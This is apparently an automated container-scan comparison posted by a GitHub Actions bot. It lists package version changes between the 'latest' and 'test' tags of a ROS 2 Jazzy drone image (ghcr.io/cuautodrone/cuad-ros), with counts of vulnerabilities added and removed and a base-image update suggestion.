➕	ros-jazzy-rosidl-core-runtime		0.2.0-3noble.20260126.171359
➕	ros-jazzy-rosidl-default-generators		1.6.0-3noble.20260126.172405
➕	ros-jazzy-rosidl-default-runtime		1.6.0-3noble.20260126.172405
➕	ros-jazzy-rosidl-dynamic-typesupport		0.1.2-3noble.20260121.184932
➕	ros-jazzy-rosidl-dynamic-typesupport-fastrtps		0.1.0-3noble.20260121.185132
➕	ros-jazzy-rosidl-generator-c		4.6.7-1noble.20260121.190725
➕	ros-jazzy-rosidl-generator-cpp		4.6.7-1noble.20260121.190850
➕	ros-jazzy-rosidl-generator-py		0.22.2-1noble.20260126.170959
➕	ros-jazzy-rosidl-generator-type-description		4.6.7-1noble.20260121.190319
➕	ros-jazzy-rosidl-parser		4.6.7-1noble.20260121.190242
➕	ros-jazzy-rosidl-pycommon		4.6.7-1noble.20260121.190342
➕	ros-jazzy-rosidl-runtime-c		4.6.7-1noble.20260121.184806
➕	ros-jazzy-rosidl-runtime-cpp		4.6.7-1noble.20260121.184935
➕	ros-jazzy-rosidl-runtime-py		0.13.1-2noble.20260121.190344
➕	ros-jazzy-rosidl-typesupport-c		3.2.2-1noble.20260126.170729
➕	ros-jazzy-rosidl-typesupport-cpp		3.2.2-1noble.20260126.171247
➕	ros-jazzy-rosidl-typesupport-fastrtps-c		3.6.3-1noble.20260122.000946
➕	ros-jazzy-rosidl-typesupport-fastrtps-cpp		3.6.3-1noble.20260121.234335
➕	ros-jazzy-rosidl-typesupport-interface		4.6.7-1noble.20260121.184738
➕	ros-jazzy-rosidl-typesupport-introspection-c		4.6.7-1noble.20260121.190852
➕	ros-jazzy-rosidl-typesupport-introspection-cpp		4.6.7-1noble.20260121.191156
➕	ros-jazzy-rpyutils		0.4.2-1noble.20260121.175712
➕	ros-jazzy-rqt-action		2.2.1-1noble.20260126.202913
➕	ros-jazzy-rqt-bag		1.5.6-1noble.20260126.202838
➕	ros-jazzy-rqt-bag-plugins		1.5.6-1noble.20260126.202912
➕	ros-jazzy-rqt-common-plugins		1.2.0-4noble.20260126.202957
➕	ros-jazzy-rqt-console		2.2.2-1noble.20260126.202803
➕	ros-jazzy-rqt-graph		1.5.6-1noble.20260126.202911
➕	ros-jazzy-rqt-gui		1.6.3-1noble.20260126.192754
➕	ros-jazzy-rqt-gui-cpp		1.6.3-1noble.20260126.175840
➕	ros-jazzy-rqt-gui-py		1.6.3-1noble.20260126.202352
➕	ros-jazzy-rqt-image-view		1.3.0-2noble.20260126.193030
➕	ros-jazzy-rqt-msg		1.5.2-1noble.20260126.202840
➕	ros-jazzy-rqt-plot		1.4.5-1noble.20260126.202758
➕	ros-jazzy-rqt-publisher		1.7.3-1noble.20260126.202844
➕	ros-jazzy-rqt-py-common		1.6.3-1noble.20260126.192804
➕	ros-jazzy-rqt-py-console		1.2.3-1noble.20260126.202903
➕	ros-jazzy-rqt-reconfigure		1.6.3-1noble.20260126.202843
➕	ros-jazzy-rqt-service-caller		1.2.2-1noble.20260126.202914
➕	ros-jazzy-rqt-shell		1.2.3-1noble.20260126.202919
➕	ros-jazzy-rqt-srv		1.2.3-1noble.20260126.202914
➕	ros-jazzy-rqt-topic		1.7.5-1noble.20260126.202834
➕	ros-jazzy-rttest		0.17.1-3noble.20260121.184742
➕	ros-jazzy-rviz-assimp-vendor		14.1.19-1noble.20260121.190126
➕	ros-jazzy-rviz-common		14.1.19-1noble.20260126.180640
➕	ros-jazzy-rviz-default-plugins		14.1.19-1noble.20260126.191150
➕	ros-jazzy-rviz-ogre-vendor		14.1.19-1noble.20260121.190131
➕	ros-jazzy-rviz-rendering		14.1.19-1noble.20260121.192948
➕	ros-jazzy-rviz2		14.1.19-1noble.20260126.201007
➕	ros-jazzy-sdl2-vendor		3.3.0-3noble.20260121.184744
➕	ros-jazzy-sensor-msgs		5.3.6-1noble.20260126.174323
➕	ros-jazzy-sensor-msgs-py		5.3.6-1noble.20260126.182327
➕	ros-jazzy-service-msgs		2.0.3-1noble.20260126.172035
➕	ros-jazzy-shape-msgs		5.3.6-1noble.20260126.175236
➕	ros-jazzy-spdlog-vendor		1.6.1-1noble.20260121.181931
➕	ros-jazzy-sqlite3-vendor		0.26.9-1noble.20260125.195426
➕	ros-jazzy-sros2		0.13.5-1noble.20260126.192847
➕	ros-jazzy-sros2-cmake		0.13.5-1noble.20260126.202307
➕	ros-jazzy-statistics-msgs		2.0.3-1noble.20260126.172518
➕	ros-jazzy-std-msgs		5.3.6-1noble.20260126.172518
➕	ros-jazzy-std-srvs		5.3.6-1noble.20260126.173903
➕	ros-jazzy-stereo-msgs		5.3.6-1noble.20260126.175233
➕	ros-jazzy-tango-icons-vendor		0.3.1-1noble.20260121.233803
➕	ros-jazzy-teleop-twist-joy		2.6.5-1noble.20260126.191500
➕	ros-jazzy-teleop-twist-keyboard		2.4.1-1noble.20260126.182749
➕	ros-jazzy-tf2		0.36.19-1noble.20260126.174405
➕	ros-jazzy-tf2-bullet		0.36.19-1noble.20260126.183649
➕	ros-jazzy-tf2-eigen		0.36.19-1noble.20260126.183648
➕	ros-jazzy-tf2-eigen-kdl		0.36.19-1noble.20260126.190758
➕	ros-jazzy-tf2-geometry-msgs		0.36.19-1noble.20260126.183656
➕	ros-jazzy-tf2-kdl		0.36.19-1noble.20260126.180753
➕	ros-jazzy-tf2-msgs		0.36.19-1noble.20260126.174415
➕	ros-jazzy-tf2-py		0.36.19-1noble.20260126.175403
➕	ros-jazzy-tf2-ros		0.36.19-1noble.20260126.180125
➕	ros-jazzy-tf2-ros-py		0.36.19-1noble.20260126.175551
➕	ros-jazzy-tf2-sensor-msgs		0.36.19-1noble.20260126.182400
➕	ros-jazzy-tf2-tools		0.36.19-1noble.20260126.190018
➕	ros-jazzy-tinyxml2-vendor		0.9.2-1noble.20260121.184817
➕	ros-jazzy-tlsf		0.9.0-3noble.20260121.184835
➕	ros-jazzy-tlsf-cpp		0.17.1-3noble.20260126.182436
➕	ros-jazzy-topic-monitor		0.33.9-1noble.20260126.181656
➕	ros-jazzy-tracetools		8.2.5-1noble.20260121.233820
➕	ros-jazzy-trajectory-msgs		5.3.6-1noble.20260126.174426
➕	ros-jazzy-turtlesim		1.8.3-1noble.20260126.180145
➕	ros-jazzy-type-description-interfaces		2.0.3-1noble.20260126.172111
➕	ros-jazzy-uncrustify-vendor		3.0.1-1noble.20260121.181949
➕	ros-jazzy-unique-identifier-msgs		2.5.0-3noble.20260126.171713
➕	ros-jazzy-urdf		2.10.0-3noble.20260126.171454
➕	ros-jazzy-urdf-parser-plugin		2.10.0-3noble.20260121.182934
➕	ros-jazzy-urdfdom		4.0.2-1noble.20260121.185109
➕	ros-jazzy-urdfdom-headers		1.1.2-1noble.20260121.175721
➕	ros-jazzy-visualization-msgs		5.3.6-1noble.20260126.174847
➕	ros-jazzy-yaml-cpp-vendor		9.0.1-1noble.20260121.181953
➕	ros-jazzy-zstd-vendor		0.26.9-1noble.20260125.195510
♾️	ros2-apt-source	1.1.0~jammy	1.1.0~noble
♾️	rpcsvc-proto	1.4.2-0ubuntu6	1.4.2-0ubuntu7
♾️	ruby	1:3.0~exp1	1:3.2~ubuntu1
♾️	ruby-net-telnet	0.1.1-2	0.2.0-1
♾️	ruby-rubygems	3.3.5-2ubuntu1.2	3.4.20-1
➕	ruby-sdbm		1.0.0-5build4
♾️	ruby-webrick	1.7.0-3ubuntu0.2	1.8.1-1ubuntu0.2
♾️	ruby-xmlrpc	0.3.2-1ubuntu0.1	0.3.2-2
➖	ruby3.0	3.0.2-7ubuntu2.11
➕	ruby3.2		3.2.3-1ubuntu0.24.04.6
♾️	screen	4.9.0-1	4.9.1-1ubuntu1
		Removed vulnerabilities (4):
♾️	sdformat14-sdf	14.8.0-1~jammy	14.9.0-1~noble
♾️	sed	4.8-1ubuntu2	4.9-2build1
♾️	sensible-utils	0.0.17	0.0.22
♾️	session-migration	0.3.6	0.3.9build1
♾️	sgml-base	1.30	1.31
♾️	shared-mime-info	2.1-2	2.4-4
♾️	shiboken2	5.15.2-2build2	5.15.13-1
♾️	sip-dev	4.19.25+dfsg-3build1	4.19.25+dfsg-5build3
♾️	software-properties-common	0.99.22.9	0.99.49.3
➕	subversion		1.14.3-1build4
♾️	sudo	1.9.9-1ubuntu2.5	1.9.15p5-3ubuntu5.24.04.1
♾️	systemd	249.11-0ubuntu3.17	255.4-1ubuntu8.12
➕	systemd-dev		255.4-1ubuntu8.12
♾️	systemd-sysv	249.11-0ubuntu3.17	255.4-1ubuntu8.12
♾️	sysvinit-utils	3.01-1ubuntu1	3.08-6ubuntu3
♾️	tango-icon-theme	0.8.90-8	0.8.90-11
♾️	tar	1.34+dfsg-1ubuntu0.1.22.04.2	1.35+dfsg-3build1
♾️	tcl	8.6.11+1build2	8.6.14build1
♾️	tcl-dev	8.6.11+1build2	8.6.14build1
♾️	tcl8.6	8.6.12+dfsg-1build1	8.6.14+dfsg-1build1
♾️	tcl8.6-dev	8.6.12+dfsg-1build1	8.6.14+dfsg-1build1
♾️	tk	8.6.11+1build2	8.6.14build1
♾️	tk-dev	8.6.11+1build2	8.6.14build1
♾️	tk8.6	8.6.12-1build1	8.6.14-1build1
♾️	tk8.6-blt2.5	2.5.3+dfsg-4.1build2	2.5.3+dfsg-7build1
♾️	tk8.6-dev	8.6.12-1build1	8.6.14-1build1
♾️	tzdata	2025b-0ubuntu0.22.04.1	2025b-0ubuntu0.24.04.1
♾️	ubuntu-keyring	2021.03.26	2023.11.28.1
♾️	ubuntu-mono	20.10-0ubuntu2	24.04-0ubuntu1
♾️	ucf	3.0043	3.0043+nmu1
♾️	udev	249.11-0ubuntu3.17	255.4-1ubuntu8.12
♾️	uncrustify	0.72.0+dfsg1-2	0.78.1+dfsg1-1
♾️	unicode-data	14.0.0-1.1	15.1.0-1
♾️	unixodbc-common	2.3.9-5ubuntu0.1	2.3.12-1ubuntu0.24.04.1
♾️	unixodbc-dev	2.3.9-5ubuntu0.1	2.3.12-1ubuntu0.24.04.1
➕	unminimize		0.2.1
➖	usrmerge	25ubuntu2
♾️	util-linux	2.37.2-4ubuntu3.4	2.39.3-9ubuntu6.4
♾️	uuid-dev	2.37.2-4ubuntu3.4	2.39.3-9ubuntu6.4
♾️	valgrind	1:3.18.1-1ubuntu2	1:3.22.0-0ubuntu3
♾️	vtk9	9.1.0+really9.1.0+dfsg2-3build1	9.1.0+really9.1.0+dfsg2-7.1build3
➕	wayland-protocols		1.45-1~ubuntu0.24.04.1
♾️	wget	1.21.2-2ubuntu1.1	1.21.4-1ubuntu4.1
➕	wx-common		3.2.4+dfsg-4build1
➕	wx3.2-headers		3.2.4+dfsg-4build1
♾️	x11-common	1:7.7+23ubuntu2	1:7.7+23ubuntu3
♾️	x11-xkb-utils	7.7+5build4	7.7+8build2
♾️	x11-xserver-utils	7.7+9build1	7.7+10build2
♾️	x11proto-dev	2021.5-1	2023.2-1
♾️	xauth	1:1.1-1build2	1:1.1.2-1build1
♾️	xbitmaps	1.1.1-2.1ubuntu1	1.1.1-2.2
♾️	xfonts-base	1:1.0.5	1:1.0.5+nmu1
♾️	xfonts-utils	1:7.7+6build2	1:7.7+6build3
♾️	xkb-data	2.33-1	2.41-2ubuntu1.1
♾️	xml-core	0.18+nmu1	0.19
♾️	xpra	3.1-1build5	3.1.5+dfsg1-0.2ubuntu1
♾️	xserver-common	2:21.1.4-2ubuntu1.7~22.04.16	2:21.1.12-1ubuntu1.5
♾️	xserver-xorg-core	2:21.1.4-2ubuntu1.7~22.04.16	2:21.1.12-1ubuntu1.5
♾️	xserver-xorg-video-dummy	1:0.3.8-2build1	1:0.4.0-1build1
♾️	xterm	372-1ubuntu1	390-1ubuntu3
♾️	xvfb	2:21.1.4-2ubuntu1.7~22.04.16	2:21.1.12-1ubuntu1.5
♾️	xz-utils	5.2.5-2ubuntu1	5.6.1+really5.4.5-1ubuntu0.2
♾️	zlib1g	1:1.2.11.dfsg-2ubuntu9.2	1:1.3.dfsg-3.1ubuntu2.1
♾️	zlib1g-dev	1:1.2.11.dfsg-2ubuntu9.2	1:1.3.dfsg-3.1ubuntu2.1

[JLP04]

Packages and Vulnerabilities (3003 package changes and 236 vulnerability changes)

• ➕ 864 packages added
• ➖ 682 packages removed
• ♾️ 1457 packages changed
• 134 packages unchanged

• ❗ 10 vulnerabilities added
• ✔️ 226 vulnerabilities removed

Changes for packages of type gem (86 changes)

	Package	Version ghcr.io/cuautodrone/cuad-ros:latest	Version ghcr.io/cuautodrone/cuad-ros:test
♾️	abbrev	0.1.0	0.1.1
♾️	base64	0.1.0	0.1.1
♾️	benchmark	0.1.1	0.2.1
♾️	bigdecimal	3.0.0	3.1.3
♾️	bundler	2.2.22	2.4.19
		Removed vulnerabilities (1):
♾️	cgi	0.2.0	0.3.6
		Removed vulnerabilities (3):
♾️	csv	3.1.9	3.2.6
♾️	date	3.1.0	3.3.3
		Removed vulnerabilities (1):
➖	dbm	1.1.0
♾️	debug	0.1.0	1.7.1
♾️	delegate	0.2.0	0.3.0
♾️	did_you_mean	1.5.0	1.6.3
♾️	digest	3.0.0	3.1.1
♾️	drb	2.0.4	2.1.1
♾️	english	0.7.1	0.7.2
♾️	erb	2.2.0	4.0.2
➕	error_highlight		0.5.1
♾️	etc	1.2.0	1.4.2
♾️	fcntl	1.0.0	1.0.2
♾️	fiddle	1.0.6	1.1.1
♾️	fileutils	1.5.0	1.7.0
♾️	find	0.1.0	0.1.1
♾️	forwardable	1.3.2	1.3.3
➖	gdbm	2.1.0
♾️	getoptlong	0.1.1	0.2.0
♾️	io-console	0.5.7	0.6.0
♾️	io-nonblock	0.1.0	0.2.0
♾️	io-wait	0.1.0	0.3.0
♾️	ipaddr	1.2.2	1.2.5
♾️	irb	1.3.5	1.6.2
♾️	json	2.5.1	2.6.3
♾️	logger	1.4.3	1.5.3
♾️	matrix	0.3.1	0.4.2
♾️	minitest	5.14.2	5.16.3
♾️	mutex_m	0.1.1	0.1.2
♾️	net-ftp	0.1.2	0.2.1
♾️	net-http	0.1.1	0.4.1
♾️	net-imap	0.1.1	0.3.4.1
			Added vulnerabilities (1):
♾️	net-pop	0.1.1	0.1.2
♾️	net-protocol	0.1.0	0.2.1
♾️	net-smtp	0.2.1	0.3.4
♾️	net-telnet	0.1.1	0.2.0
♾️	nkf	0.1.0	0.1.2
♾️	open-uri	0.1.0	0.3.0
♾️	open3	0.1.1	0.1.2
♾️	openssl	3.0.0	3.1.0
♾️	optparse	0.1.0	0.3.1
♾️	ostruct	0.3.1	0.5.5
♾️	pathname	0.1.0	0.2.1
♾️	power_assert	1.2.0	2.0.3
♾️	pp	0.1.0	0.4.0
♾️	prettyprint	0.1.0	0.1.1
♾️	pstore	0.1.1	0.1.2
♾️	psych	3.3.0	5.0.1
♾️	racc	1.5.1	1.6.2
♾️	rbs	1.0.4	2.8.2
♾️	rdoc	6.3.1	6.5.0
			Added vulnerabilities (1):
♾️	readline	0.0.2	0.0.3
♾️	readline-ext	0.1.1	0.1.5
♾️	reline	0.2.5	0.3.2
♾️	resolv	0.2.0	0.2.2
♾️	resolv-replace	0.1.0	0.1.1
♾️	rinda	0.1.0	0.1.1
➕	ruby2_keywords		0.0.5
♾️	rubygems-update	3.3.5	3.4.20
➕	sdbm		1.0.0
♾️	securerandom	0.1.0	0.2.2
♾️	set	1.0.1	1.0.3
♾️	stringio	3.0.0	3.0.4
		Removed vulnerabilities (1):
♾️	strscan	3.0.0	3.0.5
➕	syntax_suggest		1.1.0
♾️	syslog	0.1.0	0.1.1
♾️	tempfile	0.1.1	0.1.3
♾️	test-unit	3.3.7	3.5.7
♾️	time	0.1.0	0.2.2
		Removed vulnerabilities (1):
♾️	timeout	0.1.1	0.3.1
♾️	tmpdir	0.1.2	0.1.3
➖	tracer	0.1.1
♾️	tsort	0.1.0	0.1.1
♾️	typeprof	0.12.0	0.21.3
♾️	un	0.1.0	0.2.1
♾️	uri	0.10.1	0.12.2
		Removed vulnerabilities (2):
♾️	weakref	0.1.1	0.1.2
♾️	webrick	1.7.0	1.8.1
♾️	yaml	0.1.1	0.2.1
♾️	zlib	1.1.0	3.0.0

Changes for packages of type generic (1 changes)

	Package	Version ghcr.io/cuautodrone/cuad-ros:latest	Version ghcr.io/cuautodrone/cuad-ros:test
➕	ffmpeg		8.0.1

Changes for packages of type maven (1 changes)

	Package	Version ghcr.io/cuautodrone/cuad-ros:latest	Version ghcr.io/cuautodrone/cuad-ros:test
♾️	jrt-fs/jrt-fs	11.0.29	21.0.10

Changes for packages of type pypi (243 changes)

	Package	Version ghcr.io/cuautodrone/cuad-ros:latest	Version ghcr.io/cuautodrone/cuad-ros:test
♾️	action-msgs	1.2.2	2.0.3
♾️	action-tutorials-interfaces	0.20.7	0.33.9
♾️	action-tutorials-py	0.20.7	0.33.9
♾️	actionlib-msgs	4.9.0	5.3.6
♾️	ament-cmake-test	1.3.12	2.5.5
♾️	ament-copyright	0.12.14	0.17.4
♾️	ament-cppcheck	0.12.14	0.17.4
♾️	ament-cpplint	0.12.14	0.17.4
♾️	ament-flake8	0.12.14	0.17.4
♾️	ament-index-python	1.4.0	1.8.2
♾️	ament-lint	0.12.14	0.17.4
♾️	ament-lint-cmake	0.12.14	0.17.4
♾️	ament-package	0.14.1	0.16.5
♾️	ament-pep257	0.12.14	0.17.4
♾️	ament-uncrustify	0.12.14	0.17.4
♾️	ament-xmllint	0.12.14	0.17.4
♾️	angles	1.15.0	1.16.1
➖	apipkg	1.5
♾️	argcomplete	1.8.1	3.1.4
➕	attrdict3		2.0.2
♾️	attrs	21.2.0	23.2.0
➖	babel	2.8.0
		Removed vulnerabilities (1):
➖	beniget	0.4.1
♾️	blinker	1.4	1.7.0
➕	breezy		3.3.5
♾️	brotli	1.0.9	1.1.0
♾️	builtin-interfaces	1.2.2	2.0.3
♾️	certifi	2025.11.12	2026.1.4
♾️	colorama	0.4.4	0.4.6
♾️	composition-interfaces	1.2.2	2.0.3
➕	configobj		5.0.8
			Added vulnerabilities (1):
➕	contourpy		1.0.7
♾️	cryptography	3.4.8	41.0.7
		Removed vulnerabilities (6):	Added vulnerabilities (2):
♾️	cv-bridge	3.2.1	4.1.0
♾️	dbus-python	1.2.18	1.3.2
♾️	decorator	4.4.2	5.1.1
♾️	demo-nodes-py	0.20.7	0.33.9
➕	deprecated		1.2.14
♾️	diagnostic-msgs	4.9.0	5.3.6
♾️	diagnostic-updater	4.0.6	4.2.6
♾️	distlib	0.3.4	0.3.8
♾️	distro	1.7.0	1.9.0
♾️	docutils	0.17.1	0.20.1
♾️	domain-coordinator	0.10.0	0.12.0
➕	dulwich		0.21.6
♾️	example-interfaces	0.9.3	0.12.0
♾️	examples-rclpy-executors	0.15.5	0.19.7
♾️	examples-rclpy-minimal-action-client	0.15.5	0.19.7
♾️	examples-rclpy-minimal-action-server	0.15.5	0.19.7
♾️	examples-rclpy-minimal-client	0.15.5	0.19.7
♾️	examples-rclpy-minimal-publisher	0.15.5	0.19.7
♾️	examples-rclpy-minimal-service	0.15.5	0.19.7
♾️	examples-rclpy-minimal-subscriber	0.15.5	0.19.7
➕	fastbencode		0.2
♾️	fastcrc	0.3.4	0.3.5
➕	flake8-builtins		2.1.0
➕	flake8-comprehensions		3.14.0
➕	flake8-docstrings		1.6.0
➕	flake8-import-order		0.18.2
➕	flake8-quotes		3.4.0
♾️	fonttools	4.29.1	4.46.0
		Removed vulnerabilities (1):	Added vulnerabilities (1):
♾️	fs	2.4.12	2.4.16
➖	gast	0.5.2
♾️	gcovr	5.0	7.0
♾️	geometry-msgs	4.9.0	5.3.6
♾️	httplib2	0.20.2	0.20.4
♾️	image-geometry	3.2.1	4.1.0
♾️	importlib-metadata	8.0.0	8.7.1
➖	inflect	7.3.1
♾️	interactive-markers	2.3.2	2.5.5
➖	jaraco-collections	5.1.0
♾️	jaraco-context	5.3.0	6.1.0
♾️	jaraco-functools	4.0.1	4.4.0
♾️	jaraco-text	3.12.1	4.0.0
➖	jeepney	0.7.1
♾️	jinja2	3.0.3	3.1.2
➖	keyring	23.5.0
♾️	kiwisolver	1.3.2	1.4.9
♾️	lark	1.1.1	1.1.9
♾️	laser-geometry	2.4.1	2.7.2
♾️	launch	1.0.13	3.4.10
♾️	launch-ros	0.19.13	0.26.11
♾️	launch-testing	1.0.13	3.4.10
♾️	launch-testing-ros	0.19.13	0.26.11
♾️	launch-xml	1.0.13	3.4.10
♾️	launch-yaml	1.0.13	3.4.10
♾️	launchpadlib	1.10.16	1.11.0
♾️	lazr-restfulclient	0.14.4	0.14.6
♾️	lifecycle-msgs	1.2.2	2.0.3
♾️	logging-demo	0.20.7	0.33.9
♾️	lz4	3.1.3+dfsg	4.0.2+dfsg
♾️	map-msgs	2.1.0	2.4.1
♾️	markupsafe	2.0.1	2.1.5
♾️	matplotlib	3.5.1	3.6.3
♾️	mavros	2.12.0	2.14.0
♾️	mavros-msgs	2.12.0	2.14.0
➕	mercurial		6.7.2
➕	merge3		0.0.8
♾️	message-filters	4.3.11	4.11.10
♾️	more-itertools	8.10.0	10.8.0
♾️	mpi4py	3.1.3	3.1.5
➖	my-test-package	1.0
♾️	nav-msgs	4.9.0	5.3.6
➖	netifaces	0.11.0
♾️	numpy	1.21.5	2.4.2
		Removed vulnerabilities (1):
♾️	oauthlib	3.2.0	3.2.2
		Removed vulnerabilities (1):
➕	opencv-python		4.13.0.92
♾️	osrf-pycommon	2.1.6	2.1.7
♾️	packaging	25.0	26.0
➕	patiencediff		0.2.13
♾️	pendulum-msgs	0.20.7	0.33.9
♾️	pexpect	4.8.0	4.9.0
♾️	pillow	9.0.1	10.2.0
		Removed vulnerabilities (6):
♾️	pip	25.3	26.0.1
		Removed vulnerabilities (1):
♾️	platformdirs	4.2.2	4.4.0
♾️	pluggy	0.13.0	1.4.0
➖	ply	3.11
♾️	protobuf	3.12.4	4.21.12
		Removed vulnerabilities (2):
♾️	psutil	5.9.0	7.2.2
➖	py	1.10.0
♾️	pybind11	2.9.1	2.11.1
♾️	pycairo	1.20.1	1.25.1
♾️	pycodestyle	2.8.0	2.14.0
♾️	pydocstyle	6.1.1	6.3.0
♾️	pygments	2.11.2	2.17.2
		Removed vulnerabilities (1):
♾️	pygobject	3.42.1	3.48.2
♾️	pyjwt	2.3.0	2.7.0
		Removed vulnerabilities (1):
♾️	pynmeagps	1.0.56	1.1.2
♾️	pyparsing	2.4.7	3.3.2
♾️	pyqt5	5.15.6	5.15.10
♾️	pyqt5-sip	12.9.1	12.13.0
♾️	pytest	6.2.5	7.4.4
♾️	python-apt	2.4.0+ubuntu4.1	2.7.7+ubuntu5.2
♾️	python-dateutil	2.8.1	2.8.2
♾️	python-qt-binding	1.1.3	2.2.2
➖	pythran	0.10.0
♾️	pytz	2022.1	2024.1
♾️	pyyaml	5.4.1	6.0.3
♾️	qt-dotgraph	2.2.4	2.7.5
♾️	qt-gui	2.2.4	2.7.5
♾️	qt-gui-cpp	2.2.4	2.7.5
♾️	qt-gui-py-common	2.2.4	2.7.5
♾️	quality-of-service-demo-py	0.20.7	0.33.9
♾️	rcl-interfaces	1.2.2	2.0.3
♾️	rclpy	3.3.19	7.1.9
♾️	rcutils	5.1.7	6.7.5
♾️	resource-retriever	3.1.3	3.4.4
♾️	rmw-dds-common	1.6.0	3.1.1
♾️	ros2action	0.18.15	0.32.8
♾️	ros2bag	0.15.15	0.26.9
➕	ros2bag-mcap-cli		0.26.9
➕	ros2bag-sqlite3-cli		0.26.9
♾️	ros2cli	0.18.15	0.32.8
♾️	ros2component	0.18.15	0.32.8
♾️	ros2doctor	0.18.15	0.32.8
♾️	ros2interface	0.18.15	0.32.8
♾️	ros2launch	0.19.13	0.26.11
♾️	ros2lifecycle	0.18.15	0.32.8
♾️	ros2multicast	0.18.15	0.32.8
♾️	ros2node	0.18.15	0.32.8
♾️	ros2param	0.18.15	0.32.8
♾️	ros2pkg	0.18.15	0.32.8
➕	ros2plugin		5.4.4
♾️	ros2run	0.18.15	0.32.8
♾️	ros2service	0.18.15	0.32.8
♾️	ros2topic	0.18.15	0.32.8
♾️	rosbag2-interfaces	0.15.15	0.26.9
♾️	rosbag2-py	0.15.15	0.26.9
♾️	rosgraph-msgs	1.2.2	2.0.3
♾️	rosidl-adapter	3.1.7	4.6.7
♾️	rosidl-cli	3.1.7	4.6.7
♾️	rosidl-cmake	3.1.7	4.6.7
♾️	rosidl-generator-c	3.1.7	4.6.7
♾️	rosidl-generator-cpp	3.1.7	4.6.7
♾️	rosidl-generator-py	0.14.6	0.22.2
➕	rosidl-generator-type-description		4.6.7
♾️	rosidl-parser	3.1.7	4.6.7
➕	rosidl-pycommon		4.6.7
♾️	rosidl-runtime-py	0.9.3	0.13.1
♾️	rosidl-typesupport-c	2.0.2	3.2.2
♾️	rosidl-typesupport-cpp	2.0.2	3.2.2
♾️	rosidl-typesupport-fastrtps-c	2.2.3	3.6.3
♾️	rosidl-typesupport-fastrtps-cpp	2.2.3	3.6.3
♾️	rosidl-typesupport-introspection-c	3.1.7	4.6.7
♾️	rosidl-typesupport-introspection-cpp	3.1.7	4.6.7
♾️	rospkg-modules	1.6.0	1.6.1
♾️	rpyutils	0.2.2	0.4.2
♾️	rqt-action	2.0.1	2.2.1
♾️	rqt-bag	1.1.5	1.5.6
♾️	rqt-bag-plugins	1.1.5	1.5.6
♾️	rqt-console	2.0.3	2.2.2
♾️	rqt-graph	1.3.1	1.5.6
♾️	rqt-gui	1.1.9	1.6.3
♾️	rqt-gui-py	1.1.9	1.6.3
♾️	rqt-msg	1.2.0	1.5.2
♾️	rqt-plot	1.1.5	1.4.5
♾️	rqt-publisher	1.5.0	1.7.3
♾️	rqt-py-common	1.1.9	1.6.3
♾️	rqt-py-console	1.0.2	1.2.3
♾️	rqt-reconfigure	1.1.2	1.6.3
♾️	rqt-service-caller	1.0.5	1.2.2
♾️	rqt-shell	1.0.2	1.2.3
♾️	rqt-srv	1.0.3	1.2.3
♾️	rqt-topic	1.5.0	1.7.5
♾️	scipy	1.8.0	1.17.1
		Removed vulnerabilities (1):
➖	secretstorage	3.3.1
♾️	sensor-msgs	4.9.0	5.3.6
♾️	sensor-msgs-py	4.9.0	5.3.6
➕	service-msgs		2.0.3
♾️	setuptools	80.9.0	82.0.0
♾️	shape-msgs	4.9.0	5.3.6
♾️	sros2	0.10.7	0.13.5
♾️	statistics-msgs	1.2.2	2.0.3
♾️	std-msgs	4.9.0	5.3.6
♾️	std-srvs	4.9.0	5.3.6
♾️	stereo-msgs	4.9.0	5.3.6
♾️	sympy	1.9	1.12
♾️	tf2-geometry-msgs	0.25.17	0.36.19
♾️	tf2-kdl	0.25.17	0.36.19
♾️	tf2-msgs	0.25.17	0.36.19
♾️	tf2-py	0.25.17	0.36.19
♾️	tf2-ros-py	0.25.17	0.36.19
♾️	tf2-sensor-msgs	0.25.17	0.36.19
♾️	tf2-tools	0.25.17	0.36.19
➖	toml	0.10.2
♾️	tomli	2.0.1	2.4.0
♾️	topic-monitor	0.20.7	0.33.9
♾️	trajectory-msgs	4.9.0	5.3.6
♾️	turtlesim	1.4.3	1.8.3
➕	type-description-interfaces		2.0.3
➖	typeguard	4.3.0
➖	typing-extensions	4.12.2
➕	tzlocal		5.2
♾️	ufolib2	0.13.1	0.16.0
♾️	unicodedata2	14.0.0	15.1.0
♾️	unique-identifier-msgs	2.2.1	2.5.0
♾️	urllib3	2.6.2	2.0.7
			Added vulnerabilities (4):
♾️	visualization-msgs	4.9.0	5.3.6
♾️	wheel	0.45.1	0.46.3
		Removed vulnerabilities (1):
➕	wrapt		1.15.0
♾️	wxpython	4.0.7	4.2.5
♾️	xpra	3.1	3.1.5
♾️	zipp	3.19.2	3.23.0

Changes for packages of type rpm (16 changes)

	Package	Version ghcr.io/cuautodrone/cuad-ros:latest	Version ghcr.io/cuautodrone/cuad-ros:test
➕	libX11-xcb		1.6.8-9.el8_10
➕	libXau		1.0.9-3.el8
➕	libdrm		2.4.115-2.el8
➕	libgfortran		8.5.0-28.el8_10.alma.1
➕	libquadmath		8.5.0-28.el8_10.alma.1
➕	libxcb		1.13.1-1.el8
➕	libxkbcommon		0.9.1-1.el8
➕	libxkbcommon-x11		0.9.1-1.el8
➕	openblas-threads		0.3.15-6.el8
➕	openssl-libs		1.1.1k-14.el8_6
➕	pcre2-utf16		10.32-3.el8_6
➕	xcb-util		0.4.0-10.el8
➕	xcb-util-image		0.4.0-9.el8
➕	xcb-util-keysyms		0.4.0-7.el8
➕	xcb-util-renderutil		0.3.9-10.el8
➕	xcb-util-wm		0.4.1-12.el8

[github-actions]

Your image	ghcr.io/cuautodrone/cuad-ros:test
Current base image	ubuntu:24.04
Updated base image	ubuntu:26.04

[github-actions]

🔍 Vulnerabilities of ghcr.io/cuautodrone/cuad-ros:test

📦 Image Reference ghcr.io/cuautodrone/cuad-ros:test

digest	sha256:4c3e43720f006feb104038e7366d2cfc09fcae6a67ec70abd87469bfee7172e5
vulnerabilities
platform	linux/arm64
size	3.3 GB
packages	2466

📦 Base Image ubuntu:24.04

also known as	latest noble
digest	sha256:68434214381cb38287104e629fe8ee720167dd98cbb36ab1cbbab342515fa6ab
vulnerabilities

